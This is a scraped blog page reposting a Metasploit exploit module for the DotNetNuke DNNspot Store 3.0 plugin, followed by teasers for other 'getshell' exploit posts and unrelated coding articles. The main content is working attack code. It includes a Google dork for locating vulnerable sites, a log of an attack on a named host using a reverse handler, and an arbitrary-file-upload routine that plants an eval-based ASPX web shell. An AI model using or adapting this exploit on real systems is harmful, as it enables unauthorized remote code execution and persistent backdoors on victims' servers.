# Exploit Title: DotNetNuke DNNspot Store <=3.0 GetShell exploit
# Date: 31/03/2015
# Author: K8拉登哥哥
# Version: 3.0.0
# Vendor: DNNspot
# Vendor URL: https://www.dnnspot.com
# Google Dork: inurl:/DesktopModules/DNNspot-Store/
#
#msf > use exploit/windows/http/DNNspot_upload_aspx
#msf exploit(DNNspot_upload_aspx) > set RHOST qqhack8.blog.163.com
#RHOST => qqhack8.blog.163.com
#msf exploit(DNNspot_upload_aspx) > exploit

#[*] Started reverse handler on 192.168.85.158:4444
#[*] qqhack8.blog.163.com:80 - Uploading payload...
#[*] K8WebShell: qqhack8.blog.163.com:80/DesktopModules/DNNspot-Store/ProductPhotos/hhmjrrhd.aspx
#[!] This exploit may require manual cleanup of 'hhmjrrhd.aspx' on the target
#msf exploit(DNNspot_upload_aspx) >

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
        module versions below 3.0.0.
      },
      'Author'         =>
        [
          'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'DNNspot-Store / Windows', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 21 2014'))
  end

def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
    })

if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

def exploit
    @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
    exe  = generate_payload_exe
    aspx  = Msf::Util::EXE.to_exe_aspx(exe)
    post_data = Rex::MIME::Message.new
    post_data.add_part("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"tom\"],\"unsafe\");%>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
    post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      "method" => "POST",
      "uri"    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
      "data"   => data,
      "ctype"  => "multipart/form-data; boundary=#{post_data.bound}"
    })

unless res and res.code == 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

register_files_for_cleanup(@payload_name)

print_status("K8WebShell: #{peer}/DesktopModules/DNNspot-Store/ProductPhotos/#{@payload_name}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
    })
  end
end

https://github.com/k8gege/DotNetNukeEXPLOIT

https://github.com/k8gege/K8tools

[EXP]K8 DotNetNuke DNNspot Store <=3.0 GetShell exploit的更多相关文章

  1. [原创]K8 Jboss jmx-console getshell exploit

    [原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内 ...

  2. PageAdmin Cms V2.0 getshell 0day

    黑小子在土司公布了“PageAdmin cms getshell Oday”,并给出了一个漏 洞的利用EXP.经过危险漫步在虚拟机里测试,存在漏洞的是PageAdmin Cms的次最薪版本PageAd ...

  3. [EXP]CVE-2018-2628 Weblogic GetShell Exploit

    漏洞简介 漏洞威胁:RCE--远程代码执行 漏洞组件:weblogic 影响版本:10.3.6.0.12.1.3.0.12.2.1.2.12.2.1.3 代码: # -*- coding: utf-8 ...

  4. Event Store 2.0发布,带来了安全支持和测试版Projections库

    Event Store 2.0版本于上周发布,它带来了安全支持允许锁定Event Store和在事件流上设置访问控制列表.其主要新特性包括: HTTP和TCP之上的身份认证,包括账户管理 测试版Pro ...

  5. axublogcms1.1.0 Getshell

    axublogcms1.1.0 Getshell 代码执行漏洞 现在最新版是1.1.0   今天重新审计了下 axublogcms1.0.6 ,发现一处计较鸡肋的漏洞,因为并不是只有1.0.6版本存在 ...

  6. [视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程

    [视频]K8飞刀 WordPress  XSS添加管理员 & GetShell 教程 https://pan.baidu.com/s/1hq4LsmK

  7. [python]emlog相册插件getshell exploit

    昨天本站转载了emlog相册插件的漏洞分析文章,当然也有html版的getshell代码,喜欢的同学们可以直接用昨天文章中分享的代码.为了练习python,小弟用python又重写了一次,喜欢的同学们 ...

  8. [EXP]K8 jboss invoke deploy getshell exploit

    MSF jboss invoke deploy EXPLOIT moudle Date:2013.11.28 Author:K8gege 改这个EXP中 过程有点不进人意 没能在一个payload里直 ...

  9. [EXP]CVE-2019-9621 Zimbra<8.8.11 GetShell Exploit(配合Cscan可批量)

    发现时间 2019年03月18日 威胁目标 采用Zimbra邮件系统的企业 主要风险 远程代码执行 攻击入口 localconfig.xml  配置文件 使用漏洞 CVE-2019-9621 受影响应 ...

随机推荐

  1. java学习笔记(二):枚举值

    枚举值的作用:枚举限制了变量要有一些预先定义的值,运用枚举值可以大大减少你的代码中的漏洞,举例来说,如果我们想为一家鲜榨果汁店编个程序,就可以将杯子的尺寸限制为小中和大.这样就可以确保人们不会定大中小 ...

  2. 498. Diagonal Traverse对角线z型traverse

    [抄题]: Given a matrix of M x N elements (M rows, N columns), return all elements of the matrix in dia ...

  3. maven发布jar包到私服

    1.setting.xml配置 <settings xmlns="http://maven.apache.org/SETTINGS/1.0.0" xmlns:xsi=&quo ...

  4. 47-java 排列组合

    import java.util.HashSet; public class Main1 { public static int ys = 0; public static int ys2 = 0; ...

  5. python任意进制转换

    python任意进制转换 import string def module_n_converter(q, s, base=None): """ 将自然数按照给定的字符串转 ...

  6. [Machine Learning] some concept about the CV

    Cross-validation VS SSE CV is not designed to improve the fit on the training data, but it won't nec ...

  7. 2019.02.16 spoj Query on a tree IV(链分治)

    传送门 题意简述: 捉迷藏强化版(带有边权,可以为负数) 思路:好吧这次我们不用点分树,我们用听起来更屌的链分治. 直接把树剖成若干条重链,这样保证从任意一个点跳到根节点是不会跳超过logloglog ...

  8. Android 各种常见activity

    引用:Activity初学乍练 //1.拨打电话 // 给移动客服10086拨打电话 Uri uri = Uri.parse("tel:10086"); Intent intent ...

  9. xpath和lxml类库

    1. xpath和lxml lxml是一款高性能的 Python HTML/XML 解析器,我们可以利用XPath,来快速的定位特定元素以及获取节点信息 2. 什么是xpath XPath (XML ...

  10. okhttp 调用相机 上传服务器

    MainActivity package com.bwie.lianxi1; import android.content.Intent; import android.database.Cursor ...